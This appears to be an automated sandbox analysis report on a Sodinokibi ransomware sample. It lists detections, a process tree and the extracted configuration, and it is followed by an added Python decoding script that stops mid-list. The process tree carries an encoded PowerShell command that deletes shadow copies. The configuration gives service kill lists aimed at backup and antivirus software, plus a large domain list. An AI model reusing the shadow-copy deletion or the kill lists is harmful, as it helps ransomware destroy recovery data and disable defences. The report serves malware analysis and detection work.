Analysis Report zA1pLzHWuQ.exe

Overview

General Information

Sample Name:zA1pLzHWuQ.exe
Analysis ID:247003
MD5:5e034137d32d52c8b8e6b92b4a897e6e
SHA1:d2ac2ae0b4674876b2daff8defe96007558f239d
SHA256:9793e0ba85d2b0c14960b6cc506fe2aecb952795e167d504e2701b4dd399dbb6

Detection

Sodinokibi
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Found ransom note / readme
Multi AV Scanner detection for submitted file
Sigma detected: Delete Shadow Copy Via Powershell
Yara detected Sodinokibi Ransomware
Contains functionality to detect sleep reduction / modifications
Contains functionality to change the wallpaper
Encrypted powershell cmdline option found
Found Tor onion address
Machine Learning detection for sample
Modifies existing user documents (likely ransomware behavior)
Writes a notice file (html or txt) to demand a ransom
Writes many files with high entropy
Checks for available system drives (often done to infect USB drives)
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to delete services
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Startup

  • System is w10x64
  • zA1pLzHWuQ.exe (PID: 1496 cmdline: 'C:\Users\user\Desktop\zA1pLzHWuQ.exe' MD5: 5E034137D32D52C8B8E6B92B4A897E6E)
    • powershell.exe (PID: 1696 cmdline: powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA== MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 4856 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • unsecapp.exe (PID: 4684 cmdline: C:\Windows\system32\wbem\unsecapp.exe -Embedding MD5: 9CBD3EC8D9E4F8CE54258B0573C66BEB)
  • cleanup

Malware Configuration

Threatname: Sodinokibi

{"prc": [], "sub": "4525", "svc": ["sophos", "backup", "sql", "svc$", "mepocs", "veeam", "memtas", "vss"], "wht": {"ext": ["sys", "lnk", "diagcfg", "wpx", "ps1", "dll", "themepack", "drv", "cab", "scr", "icns", "lock", "diagpkg", "spl", "shs", "cpl", "msu", "ldf", "theme", "386", "idx", "deskthemepack", "ics", "msstyles", "msc", "com", "hlp", "mpa", "cmd", "mod", "diagcab", "ani", "rtp", "rom", "nls", "bat", "exe", "nomedia", "cur", "ocx", "msp", "icl", "key", "msi", "hta", "bin", "adv", "prf", "ico"], "fls": ["ntuser.dat", "ntldr", "desktop.ini", "boot.ini", "ntuser.dat.log", "bootsect.bak", "ntuser.ini", "bootfont.bin", "iconcache.db", "thumbs.db", "autorun.inf"], "fld": ["appdata", "$recycle.bin", "google", "windows.old", "perflogs", "$windows.~ws", "windows", "system volume information", "intel", "$windows.~bt", "application data", "msocache", "mozilla", "tor browser", "boot"]}, "img": "LQAtAC0APQA9AD0AIABTAG8AZABpAG4AbwBrAGkAYgBpACAAUgBhAG4AcwBvAG0AdwBhAHIAZQAgAD0APQA9AC0ALQAtAA0ACgANAAoAQQBsAGwAIABvAGYAIAB5AG8AdQByACAAZgBpAGwAZQBzACAAYQByAGUAIABlAG4AYwByAHkAcAB0AGUAZAAhAA0ACgANAAoARgBpAG4AZAAgAHsARQBYAFQAfQAtAHIAZQBhAGQAbQBlAC4AdAB4AHQAIABhAG4AZAAgAGYAbwBsAGwAbwB3ACAAaQBuAHMAdAB1AGMAdABpAG8AbgBzAAAA", "dmn": 
"jenniferandersonwriter.com;antonmack.de;phantastyk.com;cite4me.org;paradicepacks.com;international-sound-awards.com;videomarketing.pro;kedak.de;ilso.net;smithmediastrategies.com;theapifactory.com;skanah.com;vihannesporssi.fi;anybookreader.de;smale-opticiens.nl;allfortheloveofyou.com;corendonhotels.com;kosterra.com;tanzschule-kieber.de;hairstylesnow.site;winrace.no;idemblogs.com;zimmerei-deboer.de;xn--singlebrsen-vergleich-nec.com;architecturalfiberglass.org;twohourswithlena.wordpress.com;bimnapratica.com;webhostingsrbija.rs;pt-arnold.de;carriagehousesalonvt.com;noixdecocom.fr;evergreen-fishing.com;craftleathermnl.com;backstreetpub.com;trystana.com;ihr-news.jp;cimanchesterescorts.co.uk;dekkinngay.com;pv-design.de;restaurantesszimmer.de;ravensnesthomegoods.com;art2gointerieurprojecten.nl;marchand-sloboda.com;vibethink.net;broseller.com;andersongilmour.co.uk;tinyagency.com;shiftinspiration.com;rebeccarisher.com;triggi.de;pawsuppetlovers.com;bundabergeyeclinic.com.au;commonground-stories.com;ussmontanacommittee.us;coding-marking.com;olejack.ru;starsarecircular.org;katketytaanet.fi;takeflat.com;balticdermatology.lt;sinal.org;purposeadvisorsolutions.com;waywithwords.net;aglend.com.au;punchbaby.com;imaginado.de;hypozentrum.com;victoriousfestival.co.uk;seproc.hn;stupbratt.no;allamatberedare.se;lloydconstruction.com;maratonaclubedeportugal.com;hashkasolutindo.com;eaglemeetstiger.de;otto-bollmann.de;toponlinecasinosuk.co.uk;8449nohate.org;helikoptervluchtnewyork.nl;blewback.com;mymoneyforex.com;agence-referencement-naturel-geneve.net;mezhdu-delom.ru;platformier.com;deoudedorpskernnoordwijk.nl;thomas-hospital.de;kalkulator-oszczednosci.pl;x-ray.ca;rehabilitationcentersinhouston.net;run4study.com;crowd-patch.co.uk;anteniti.com;euro-trend.pl;dutchbrewingcoffee.com;bookspeopleplaces.com;smokeysstoves.com;bhwlawfirm.com;bloggyboulga.net;smejump.co.th;madinblack.com;merzi.info;maryloutaylor.com;nestor-swiss.ch;craigmccabe.fun;smart-light.co.uk;minipara.com;talentwunder.com;asiluxu
ry.com;kadesignandbuild.co.uk;julis-lsa.de;ceres.org.au;gratispresent.se;body-guards.it;nuzech.com;hotelsolbh.com.br;darrenkeslerministries.com;oneplusresource.org;sw1m.ru;real-estate-experts.com;maasreusel.nl;bierensgebakkramen.nl;shadebarandgrillorlando.com;kissit.ca;homng.net;galserwis.pl;werkkring.nl;catholicmusicfest.com;coursio.com;journeybacktolife.com;rosavalamedahr.com;tulsawaterheaterinstallation.com;kariokids.com;miraclediet.fun;theshungiteexperience.com.au;em-gmbh.ch;southeasternacademyofprosthodontics.org;conexa4papers.trade;lapinlviasennus.fi;noesis.tech;plastidip.com.ar;notmissingout.com;autodujos.lt;xtptrack.com;ziegler-praezisionsteile.de;macabaneaupaysflechois.com;acomprarseguidores.com;bayoga.co.uk;rushhourappliances.com;worldhealthbasicinfo.com;cityorchardhtx.com;ctrler.cn;flexicloud.hk;abogados-en-alicante.es;pridoxmaterieel.nl;bptdmaluku.com;beaconhealthsystem.org;wychowanieprzedszkolne.pl;edv-live.de;milsing.hr;kamahouse.net;jusibe.com;rota-installations.co.uk;naturalrapids.com;imperfectstore.com;dezatec.es;walter-lemm.de;quemargrasa.net;campusoutreach.org;visiativ-industry.fr;actecfoundation.org;muamuadolls.com;urist-bogatyr.ru;aminaboutique247.com;icpcnj.org;mooglee.com;kisplanning.com.au;thedresserie.com;rozemondcoaching.nl;onlybacklink.com;boosthybrid.com.au;mmgdouai.fr;groupe-cets.com;fitovitaforum.com;fitnessbazaar.com;gasbarre.com;coastalbridgeadvisors.com;solhaug.tk;shiresresidential.com;sportverein-tambach.de;digivod.de;bordercollie-nim.nl;transportesycementoshidalgo.es;tandartspraktijkhartjegroningen.nl;wurmpower.at;oemands.dk;bricotienda.com;wsoil.com.sg;alysonhoward.com;deko4you.at;argenblogs.com.ar;aco-media.nl;hatech.io;oldschoolfun.net;stormwall.se;antenanavi.com;haar-spange.com;aakritpatel.com;oslomf.no;biortaggivaldelsa.com;satyayoga.de;tongdaifpthaiphong.net;rafaut.com;abogadosadomicilio.es;id-et-d.fr;creamery201.com;symphonyenvironmental.com;skiltogprint.no;milestoneshows.com;spsshomeworkhelp.com;synlab.lt;nachhilfe-unterric
ht.com;nsec.se;lynsayshepherd.co.uk;botanicinnovations.com;id-vet.com;gantungankunciakrilikbandung.com;ino-professional.ru;schmalhorst.de;exenberger.at;fotoideaymedia.es;ausair.com.au;spargel-kochen.de;dr-pipi.de;vannesteconstruct.be;parkstreetauto.net;pelorus.group;dr-tremel-rednitzhembach.de;puertamatic.es;milanonotai.it;huehnerauge-entfernen.de;insidegarage.pl;artallnightdc.com;themadbotter.com;fannmedias.com;sairaku.net;ligiercenter-sachsen.de;thenewrejuveme.com;notsilentmd.org;lecantou-coworking.com;you-bysia.com.au;perbudget.com;mediaclan.info;helenekowalsky.com;ilive.lt;sarbatkhalsafoundation.org;schutting-info.nl;travelffeine.com;101gowrie.com;edelman.jp;iphoneszervizbudapest.hu;kojinsaisei.info;abuelos.com;i-trust.dk;tomaso.gr;lachofikschiet.nl;centrospgolega.com;ilcdover.com;vesinhnha.com.vn;first-2-aid-u.com;tsklogistik.eu;rumahminangberdaya.com;DupontSellsHomes.com;antiaginghealthbenefits.com;triactis.com;asgestion.com;lenreactiv-shop.ru;admos-gleitlager.de;edrcreditservices.nl;mindpackstudios.com;extensionmaison.info;dubscollective.com;alfa-stroy72.com;sportiomsportfondsen.nl;praxis-management-plus.de;fairfriends18.de;mank.de;homesdollar.com;comarenterprises.com;abitur-undwieweiter.de;prochain-voyage.net;friendsandbrgrs.com;tarotdeseidel.com;mepavex.nl;turkcaparbariatrics.com;songunceliptv.com;pickanose.com;rostoncastings.co.uk;evologic-technologies.com;nurturingwisdom.com;adoptioperheet.fi;slimidealherbal.com;dramagickcom.wordpress.com;fitnessingbyjessica.com;goodgirlrecovery.com;educar.org;bridgeloanslenders.com;htchorst.nl;toreria.es;huissier-creteil.com;thedad.com;bingonearme.org;geoffreymeuli.com;beautychance.se;herbstfeststaefa.ch;blogdecachorros.com;bee4win.com;familypark40.com;fransespiegels.nl;elpa.se;lusak.at;almosthomedogrescue.dog;linnankellari.fi;pasvenska.se;lykkeliv.net;alhashem.net;oceanastudios.com;vorotauu.ru;ecoledansemulhouse.fr;richard-felix.co.uk;mousepad-direkt.de;saxtec.com;crosspointefellowship.church;castillobalduz.es;jacquin-m
aquettes.com;campus2day.de;mdacares.com;solinegraphic.com;zewatchers.com;caffeinternet.it;samnewbyjax.com;nicoleaeschbachorg.wordpress.com;web.ion.ag;lucidinvestbank.com;happyeasterimages.org;tampaallen.com;lightair.com;xn--fn-kka.no;villa-marrakesch.de;foryourhealth.live;faronics.com;bodyforwife.com;ohidesign.com;dsl-ip.de;cafemattmeera.com;zervicethai.co.th;firstpaymentservices.com;berliner-versicherungsvergleich.de;321play.com.hk;daniel-akermann-architektur-und-planung.ch;artige.com;team-montage.dk;foretprivee.ca;mir-na-iznanku.com;ateliergamila.com;hellohope.com;noskierrenteria.com;smessier.com;carrybrands.nl;greenfieldoptimaldentalcare.com;pmcimpact.com;mediaplayertest.net;destinationclients.fr;besttechie.com;juneauopioidworkgroup.org;hiddencitysecrets.com.au;limassoldriving.com;latestmodsapks.com;geekwork.pl;tux-espacios.com;completeweddingkansas.com;cwsitservices.co.uk;hexcreatives.co;live-con-arte.de;ouryoungminds.wordpress.com;liliesandbeauties.org;dnepr-beskid.com.ua;craigvalentineacademy.com;connectedace.com;charlesreger.com;croftprecision.co.uk;desert-trails.com;modamilyon.com;vloeren-nu.nl;sevenadvertising.com;tuuliautio.fi;kmbshipping.co.uk;kuntokeskusrok.fi;denifl-consulting.at;bunburyfreightservices.com.au;modestmanagement.com;karacaoglu.nl;deprobatehelp.com;wellplast.se;yamalevents.com;mrsfieldskc.com;teresianmedia.org;theletter.company;agence-chocolat-noir.com;jerling.de;paulisdogshop.de;sobreholanda.com;figura.team;slashdb.com;leoben.at;hrabritelefon.hr;freie-baugutachterpraxis.de;pcprofessor.com;caribbeansunpoker.com;comparatif-lave-linge.fr;simoneblum.de;theduke.de;norovirus-ratgeber.de;dlc.berlin;allentownpapershow.com;steampluscarpetandfloors.com;shonacox.com;iwr.nl;brigitte-erler.com;fatfreezingmachines.com;jobmap.at;braffinjurylawfirm.com;garage-lecompte-rouen.fr;trackyourconstruction.com;pferdebiester.de;global-kids.info;lescomtesdemean.be;makeurvoiceheard.com;mooshine.com;neuschelectrical.co.za;lefumetdesdombes.com;markelbroch.com;ecpmedia
.vn;consultaractadenacimiento.com;xlarge.at;irishmachineryauctions.com;teczowadolina.bytom.pl;geisterradler.de;sofavietxinh.com;gasolspecialisten.se;eraorastudio.com;hhcourier.com;alsace-first.com;frontierweldingllc.com;spd-ehningen.de;cirugiauretra.es;hmsdanmark.dk;justinvieira.com;smhydro.com.pl;gopackapp.com;simulatebrain.com;tastewilliamsburg.com;jiloc.com;bbsmobler.se;naswrrg.org;bodyfulls.com;simplyblessedbykeepingitreal.com;n1-headache.com;kaminscy.com;igfap.com;americafirstcommittee.org;iwelt.de;grupocarvalhoerodrigues.com.br;simpkinsedwards.co.uk;better.town;abogadoengijon.es;joyeriaorindia.com;paymybill.guru;mrxermon.de;lebellevue.fr;tetinfo.in;whittier5k.com;gamesboard.info;calabasasdigest.com;mylovelybluesky.com;celularity.com;withahmed.com;chatizel-paysage.fr;hugoversichert.de;radaradvies.nl;sweering.fr;softsproductkey.com;cranleighscoutgroup.org;gonzalezfornes.es;judithjansen.com;waermetauscher-berechnen.de;solerluethi-allart.ch;ecopro-kanto.com;renergysolution.com;harpershologram.wordpress.com;roygolden.com;fayrecreations.com;devok.info;quizzingbee.com;mrsplans.net;birnam-wood.com;pier40forall.org;stemplusacademy.com;aprepol.com;lubetkinmediacompanies.com;asteriag.com;rimborsobancario.net;architekturbuero-wagner.net;trapiantofue.it;zenderthelender.com;grelot-home.com;berlin-bamboo-bikes.org;heliomotion.com;argos.wityu.fund;falcou.fr;cactusthebrand.com;krcove-zily.eu;smartypractice.com;spacecitysisters.org;strandcampingdoonbeg.com;nakupunafoundation.org;thomasvicino.com;love30-chanko.com;sterlingessay.com;xn--logopdie-leverkusen-kwb.de;joseconstela.com;conasmanagement.de;navyfederalautooverseas.com;shhealthlaw.com;1kbk.com.ua;blood-sports.net;myzk.site;lichencafe.com;365questions.org;seevilla-dr-sturm.at;hvccfloorcare.com;xn--thucmctc-13a1357egba.com;whyinterestingly.ru;upmrkt.co;apprendrelaudit.com;pixelarttees.com;offroadbeasts.com;bigasgrup.com;herbayupro.com;mylolis.com;yousay.site;presseclub-magdeburg.de;groupe-frayssinet.fr;klimt2012.info;jbbjw.c
om;oneheartwarriors.at;globedivers.wordpress.com;summitmarketingstrategies.com;camsadviser.com;pinkexcel.com;testzandbakmetmening.online;todocaracoles.com;space.ua;xn--fnsterputssollentuna-39b.se;marathonerpaolo.com;jolly-events.com;jameskibbie.com;tstaffing.nl;bildungsunderlebnis.haus;zso-mannheim.de;boulderwelt-muenchen-west.de;modelmaking.nl;dw-css.de;hokagestore.com;bouncingbonanza.com;tips.technology;associacioesportivapolitg.cat;hebkft.hu;malychanieruchomoscipremium.com;levdittliv.se;iyahayki.nl;eco-southafrica.com;lukeshepley.wordpress.com;mariposapropaneaz.com;expandet.dk;mbxvii.com;homecomingstudio.com;dutchcoder.nl;nacktfalter.de;ahouseforlease.com;unim.su;blacksirius.de;thaysa.com;thee.network;candyhouseusa.com;oncarrot.com;deltacleta.cat;atalent.fi;littlebird.salon;boompinoy.com;centuryrs.com;ostheimer.at;tigsltd.com;sexandfessenjoon.wordpress.com;buroludo.nl;operaslovakia.sk;aarvorg.com;cerebralforce.net;musictreehouse.net;dirittosanitario.biz;osterberg.fi;luxurytv.jp;cuspdental.com;entopic.com;lapmangfpt.info.vn;syndikat-asphaltfieber.de;logopaedie-blomberg.de;hoteledenpadova.it;troegs.com;outcomeisincome.com;fax-payday-loans.com;12starhd.online;hairnetty.wordpress.com;myhostcloud.com;advokathuset.dk;dpo-as-a-service.com;bxdf.info;patrickfoundation.net;adultgamezone.com;nataschawessels.com;bastutunnan.se;greenpark.ch;csgospeltips.se;odiclinic.org;vitalyscenter.es;apolomarcas.com;ki-lowroermond.nl;parks-nuernberg.de;bradynursery.com;sahalstore.com;lange.host;yassir.pro;spylista.com;advizewealth.com;intecwi.com;baylegacy.com;maineemploymentlawyerblog.com;denovofoodsgroup.com;vancouver-print.ca;35-40konkatsu.net;c2e-poitiers.com;mirjamholleman.nl;stingraybeach.com;precisionbevel.com;raschlosser.de;profectis.de;westdeptfordbuyrite.com;romeguidedvisit.com;gw2guilds.org;faizanullah.com;bestbet.com;femxarxa.cat;cortec-neuro.com;wien-mitte.co.at;vox-surveys.com;bigler-hrconsulting.ch;creative-waves.co.uk;sojamindbody.com;ralister.co.uk;ncuccr.org;digi-talents.
com;airconditioning-waalwijk.nl;marketingsulweb.com;deschl.net;lbcframingelectrical.com;devstyle.org;bowengroup.com.au;balticdentists.com;sla-paris.com;eadsmurraypugh.com;cheminpsy.fr;yourobgyn.net;pierrehale.com;petnest.ir;enovos.de;unetica.fr;spectrmash.ru;promalaga.es;thewellnessmimi.com;xn--rumung-bua.online;ausbeverage.com.au;portoesdofarrobo.com;kikedeoliveira.com;liveottelut.com;uimaan.fi;longislandelderlaw.com;fotoscondron.com;higadograsoweb.com;truenyc.co;mbfagency.com;bafuncs.org;socstrp.org;nmiec.com;cursosgratuitosnainternet.com;urmasiimariiuniri.ro;trulynolen.co.uk;vibehouse.rw;centromarysalud.com;mapawood.com;y-archive.com;burkert-ideenreich.de;penco.ie;philippedebroca.com;ceid.info.tr;seminoc.com;wacochamber.com;greenko.pl;brawnmediany.com;vickiegrayimages.com;polychromelabs.com;ungsvenskarna.se;tanzprojekt.com;physiofischer.de;officehymy.com;mediaacademy-iraq.org;hushavefritid.dk;upplandsspar.se;4net.guru;plotlinecreative.com;levihotelspa.fi;vietlawconsultancy.com;polymedia.dk;highlinesouthasc.com;esope-formation.fr;jobcenterkenya.com;mdk-mediadesign.de;verifort-capital.de;iviaggisonciliegie.it;manifestinglab.com;corona-handles.com;blgr.be;socialonemedia.com;humanityplus.org;allure-cosmetics.at;behavioralmedicinespecialists.com;mountsoul.de;micro-automation.de;podsosnami.ru;blumenhof-wegleitner.at;highimpactoutdoors.net;dareckleyministries.com;michaelsmeriglioracing.com;2ekeus.nl;fibrofolliculoma.info;mrtour.site;gymnasedumanagement.com;ai-spt.jp;arteservicefabbro.com;galleryartfair.com;makeflowers.ru;manutouchmassage.com;forestlakeuca.org.au;freie-gewerkschaften.de;narcert.com;micahkoleoso.de;drfoyle.com;i-arslan.de;bsaship.com;naturstein-hotte.de;finde-deine-marke.de;rksbusiness.com;moveonnews.com;saka.gr;bouldercafe-wuppertal.de;kunze-immobilien.de;heurigen-bauer.at;bouquet-de-roses.com;jorgobe.at;humancondition.com;baptisttabernacle.com;courteney-cox.net;augenta.com;forskolorna.org;blossombeyond50.com;retroearthstudio.com;appsformacpc.com;no-plan
s.com;assurancesalextrespaille.fr;fundaciongregal.org;rhinosfootballacademy.com;devlaur.com;1team.es;finediningweek.pl;personalenhancementcenter.com;qualitaetstag.de;readberserk.com;echtveilig.nl;igorbarbosa.com;woodworkersolution.com;wasmachtmeinfonds.at;sanyue119.com;siliconbeach-realestate.com;work2live.de;veybachcenter.de;slwgs.org;mountaintoptinyhomes.com;systemate.dk;handi-jack-llc.com;d1franchise.com;senson.fi;stampagrafica.es;corelifenutrition.com;clos-galant.com;schmalhorst.de;polzine.net;slupetzky.at;ftf.or.at;baronloan.org;buymedical.biz;danholzmann.com;ampisolabergeggi.it;mirjamholleman.nl;deepsouthclothingcompany.com;eglectonk.online;itelagen.com;rieed.de;stefanpasch.me;fiscalsort.com;heidelbergartstudio.gallery;gemeentehetkompas.nl;wolf-glas-und-kunst.de;dontpassthepepper.com;koken-voor-baby.nl;uranus.nl;funjose.org.gt;verbisonline.com;epwritescom.wordpress.com;easytrans.com.au;ymca-cw.org.uk;kevinjodea.com;marcuswhitten.site;knowledgemuseumbd.com;sachnendoc.com;psc.de;biapi-coaching.fr;sauschneider.info;lascuola.nl;div-vertriebsforschung.de;zflas.com;insp.bi;miriamgrimm.de;boisehosting.net;gporf.fr;theclubms.com;chaotrang.com;the-virtualizer.com;nvwoodwerks.com;huesges-gruppe.de;danubecloud.com;filmstreamingvfcomplet.be;microcirc.net;waynela.com;despedidascostablanca.es;havecamerawilltravel2017.wordpress.com;people-biz.com;sanaia.com;zimmerei-fl.de;mardenherefordshire-pc.gov.uk;bogdanpeptine.ro;seagatesthreecharters.com;zieglerbrothers.de;xoabigail.com;alvinschwartz.wordpress.com;kamienny-dywan24.pl;xn--vrftet-pua.biz;corola.es;austinlchurch.com;smalltownideamill.wordpress.com;makeitcount.at;delawarecorporatelaw.com;tradiematepro.com.au;aniblinova.wordpress.com;chefdays.de;transliminaltribe.wordpress.com;ledmes.ru;aunexis.ch;simpliza.com;tomoiyuma.com;www1.proresult.no;ncid.bc.ca;gastsicht.de;amerikansktgodis.se;cyntox.com;resortmtn.com;sandd.nl;stopilhan.com;latribuessentielle.com;stoeberstuuv.de;plv.media;drinkseed.com;pasivect.co.uk;lorenacarnero.c
om;hannah-fink.de;coding-machine.com;nativeformulas.com;woodleyacademy.org;celeclub.org;bauertree.com;webcodingstudio.com;jadwalbolanet.info;lmtprovisions.com;autopfand24.de;ivivo.es;jvanvlietdichter.nl;pubweb.carnet.hr;parebrise-tla.fr;cursoporcelanatoliquido.online;kindersitze-vergleich.de;memaag.com;slimani.net;reddysbakery.com;tanciu.com;kingfamily.construction;seitzdruck.com;vdberg-autoimport.nl;ikads.org;tinkoff-mobayl.ru;basisschooldezonnewijzer.nl;kostenlose-webcams.com;izzi360.com;bargningharnosand.se;aselbermachen.com;erstatningsadvokaterne.dk;kath-kirche-gera.de;chavesdoareeiro.com;analiticapublica.es;classycurtainsltd.co.uk;carolinepenn.com;supportsumba.nl;crediacces.com;gadgetedges.com;christ-michael.net;interactcenter.org;jeanlouissibomana.com;pomodori-pizzeria.de;wari.com.pe;milltimber.aberdeen.sch.uk;parkcf.nl;surespark.org.uk;brandl-blumen.de;baustb.de;walkingdeadnj.com;selfoutlet.com;meusharklinithome.wordpress.com;harveybp.com;pogypneu.sk;urclan.net;embracinghiscall.com;teknoz.net;thefixhut.com;pay4essays.net;norpol-yachting.com;ogdenvision.com;danskretursystem.dk;kaotikkustomz.com;psa-sec.de;coffreo.biz;bargningavesta.se;diversiapsicologia.es;datacenters-in-europe.com;launchhubl.com;piajeppesen.dk;nokesvilledentistry.com;kafu.ch;abogadosaccidentetraficosevilla.es;copystar.co.uk;ncs-graphic-studio.com;stemenstilte.nl;answerstest.ru;schoellhammer.com;mirkoreisser.de;jasonbaileystudio.com;kao.at;kaliber.co.jp;montrium.com;manijaipur.com;zonamovie21.net;pcp-nc.com;baumkuchenexpo.jp;ora-it.de;rerekatu.com;nandistribution.nl;sportsmassoren.com;cnoia.org;verytycs.com;gmto.fr;hotelzentral.at;panelsandwichmadrid.es;peterstrobos.com;remcakram.com;chrissieperry.com;crowcanyon.com;tecnojobsnet.com;praxis-foerderdiagnostik.de;insigniapmg.com;kampotpepper.gives;irinaverwer.com;vetapharma.fr;myhealth.net.au;christinarebuffetcourses.com;shsthepapercut.com;ditog.fr;krlosdavid.com;iyengaryogacharlotte.com;hardinggroup.com;caribdoctor.org;extraordinaryoutdoors.com;
hkr-reise.de;lapinvihreat.fi;aodaichandung.com;vyhino-zhulebino-24.ru;wmiadmin.com;vitavia.lt;siluet-decor.ru;cuppacap.com;quickyfunds.com;otsu-bon.com;wraithco.com;zzyjtsgls.com;midmohandyman.com;fizzl.ru;mooreslawngarden.com;stoneys.ch;brevitempore.net;dubnew.com;saarland-thermen-resort.com;imadarchid.com;nancy-informatique.fr;tandartspraktijkheesch.nl;stoeferlehalle.de;abl1.net;mastertechengineering.com;anthonystreetrimming.com;jyzdesign.com;boldcitydowntown.com;poultrypartners.nl;edgewoodestates.org;webmaster-peloton.com;sabel-bf.com;maxadams.london;autofolierung-lu.de;live-your-life.jp;fensterbau-ziegler.de;all-turtles.com;new.devon.gov.uk;vanswigchemdesign.com;smogathon.com;bigbaguettes.eu;dinslips.se;kirkepartner.dk;degroenetunnel.com;klusbeter.nl;schlafsack-test.net;sotsioloogia.ee;newyou.at;thailandholic.com;sloverse.com;citymax-cr.com;ontrailsandboulevards.com;nosuchthingasgovernment.com;leeuwardenstudentcity.nl;pmc-services.de;iqbalscientific.com;danielblum.info;nijaplay.com;streamerzradio1.site;testcoreprohealthuk.com;porno-gringo.com;amylendscrestview.com;schraven.de;pocket-opera.de;waveneyrivercentre.co.uk;glennroberts.co.nz;myteamgenius.com;employeesurveys.com;zweerscreatives.nl;body-armour.online;xltyu.com;gaiam.nl;instatron.net;mikeramirezcpa.com;importardechina.info;commercialboatbuilding.com;scenepublique.net;mercantedifiori.com;servicegsm.net;tonelektro.nl;controldekk.com;ladelirante.fr;onlyresultsmarketing.com;ianaswanson.com;compliancesolutionsstrategies.com;stacyloeb.com;ccpbroadband.com;elimchan.com;autodemontagenijmegen.nl;schoolofpassivewealth.com;dushka.ua;opatrovanie-ako.sk;refluxreducer.com;serce.info.pl;financescorecard.com;ra-staudte.de;sipstroysochi.ru;aurum-juweliere.de;directwindowco.com;jandaonline.com;maureenbreezedancetheater.org;babcockchurch.org;koko-nora.dk;torgbodenbollnas.se;projetlyonturin.fr;henricekupper.com;houseofplus.com;securityfmm.com;binder-buerotechnik.at;ulyssemarketing.com;sagadc.com;drugdevice.org;loprus.pl;koji
ma-shihou.com;dublikator.com;leather-factory.co.jp;farhaani.com;rollingrockcolumbia.com;stallbyggen.se;accountancywijchen.nl;ftlc.es;liikelataamo.fi;charlottepoudroux-photographie.fr;innote.fi;bockamp.com;pivoineetc.fr;naturavetal.hr;darnallwellbeing.org.uk;durganews.com;artotelamsterdam.com;sporthamper.com;daklesa.de;licor43.de;carlosja.com;lionware.de;qlog.de;roadwarrior.app;chandlerpd.com;drnice.de;executiveairllc.com;associationanalytics.com;faroairporttransfers.net;ivfminiua.com;tophumanservicescourses.com;c-a.co.in;katiekerr.co.uk;plantag.de;strategicstatements.com;monark.com;collaborativeclassroom.org;healthyyworkout.com;tennisclubetten.nl;filmvideoweb.com;evangelische-pfarrgemeinde-tuniberg.de;dr-seleznev.com;planchaavapor.net;labobit.it;blog.solutionsarchitect.guru;luckypatcher-apkz.com;partnertaxi.sk;theadventureedge.com;newstap.com.ng;ventti.com.ar;4youbeautysalon.com;proudground.org;atozdistribution.co.uk;girlillamarketing.com;johnsonfamilyfarmblog.wordpress.com;morawe-krueger.de;ruralarcoiris.com;promesapuertorico.com;parking.netgateway.eu;jakekozmor.com;mytechnoway.com;calxplus.eu;layrshift.eu;the-domain-trader.com;tenacitytenfold.com;atmos-show.com;beyondmarcomdotcom.wordpress.com;kenhnoithatgo.com;alten-mebel63.ru;qualitus.com;123vrachi.ru;cleliaekiko.online;marietteaernoudts.nl;colorofhorses.com;vermoote.de;delchacay.com.ar;suncrestcabinets.ca;pointos.com;revezlimage.com;bristolaeroclub.co.uk;igrealestate.com;jsfg.com;haremnick.com;spinheal.ru;leda-ukraine.com.ua;kidbucketlist.com.au;hihaho.com;facettenreich27.de;psnacademy.in;rocketccw.com;nhadatcanho247.com;lillegrandpalais.com;d2marketing.co.uk;effortlesspromo.com", "dbg": false, "pid": "$2a$10$WqroPLuGGB8.GkWvYmBTzO.SoZk/JFe19yqHNtd5pm5DrGtAIOunO", "nbody": "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", "et": 0, "wipe": false, "wfld": ["backup"], "nname": "{EXT}-readme.txt", "pk": "jButbpNlvoIWVhEICJ6yN2fkJtSPEPAeh/Pbds99MC0=", "net": true, "exp": false, "arn": false}
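
Working through the configuration above in code, as an added example (not Joe Sandbox's extractor and not the sample's own logic): the block decodes the UTF-16LE "img" text, checks the length of "pk", and applies the "svc" and "wht" entries to constructed service names and paths. The list contents are copied from the configuration shown; "dmn", "nbody" and the remaining scalar fields are left out of the copy. The matching semantics (case-insensitive substring match for services, component-wise match for folders, exact match for file names and extensions), the Curve25519 remark, the sample inputs and the "k3x9q" extension are assumptions. The misspelling in the decoded message is in the sample, not a transcription error.

```python
"""Work through the configuration extracted above: decode the UTF-16LE
message, check the key size, and apply the service and whitelist entries.
Added example, not Joe Sandbox's extractor and not the sample's code."""
import base64
from pathlib import PureWindowsPath
from typing import Dict, List

# Fields copied from the configuration on this page; "dmn", "nbody", "prc",
# "pid", "dbg", "et", "exp" and "arn" are left out of this copy.
CONFIG: Dict = {
    "sub": "4525",
    "svc": ["sophos", "backup", "sql", "svc$", "mepocs", "veeam", "memtas", "vss"],
    "wht": {
        "ext": ("sys lnk diagcfg wpx ps1 dll themepack drv cab scr icns lock diagpkg "
                "spl shs cpl msu ldf theme 386 idx deskthemepack ics msstyles msc com "
                "hlp mpa cmd mod diagcab ani rtp rom nls bat exe nomedia cur ocx msp "
                "icl key msi hta bin adv prf ico").split(),
        "fls": ["ntuser.dat", "ntldr", "desktop.ini", "boot.ini", "ntuser.dat.log",
                "bootsect.bak", "ntuser.ini", "bootfont.bin", "iconcache.db",
                "thumbs.db", "autorun.inf"],
        "fld": ["appdata", "$recycle.bin", "google", "windows.old", "perflogs",
                "$windows.~ws", "windows", "system volume information", "intel",
                "$windows.~bt", "application data", "msocache", "mozilla",
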